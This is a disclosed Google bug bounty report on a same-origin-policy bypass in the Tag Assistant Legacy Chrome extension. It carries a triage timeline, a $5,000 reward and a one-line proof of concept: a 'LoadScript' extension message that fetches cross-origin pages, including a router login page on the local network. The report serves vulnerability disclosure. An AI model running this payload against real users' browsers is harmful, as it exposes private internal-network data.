Skip to Content (Press Enter)
Google
Bug Hunters
SOP bypass via Tag Assistant Legacy
Reported by:
NDevTK
Google VRP
triaged
17:53 | Jun 8, 2023
accepted
18:11 | Jun 8, 2023
triaged
20:23 | Jul 4, 2023
accepted
21:01 | Jul 4, 2023
triaged
07:06 | Jul 15, 2023
accepted
06:06 | Aug 8, 2023
triaged
15:07 | Aug 9, 2023
accepted
17:50 | Aug 14, 2023
fixed
07:50 | Sep 1, 2023
reward decided
$5,000
Summary:
SOP bypass via Tag Assistant Legacy
Product:
Google Tag Assistant
URL:
https://chrome.google.com/webstore/detail/tag-assistant-legacy-by-g/kejbdjndbnbjgmefkgdddjlbokphdefk/
Vulnerability type:
Sensitive data exposure
Details
In the context of the content script on an attacker controlled website:
chrome.runtime.sendMessage({message: 'LoadScript', url: '
https://www.google.com'}
, console.log);
Attack scenario
A compromised renderer can bypass the same origin policy.
I don't think this includes cookies however this may leak sensitive data from the user internal network.
For example chrome.runtime.sendMessage({message: 'LoadScript', url: '
http://192.168.1.1'}
, console.log); leaks the login page of my router which is not ideal.
Done as part of Grant issue 286169438
登录
使用 Google 账号登录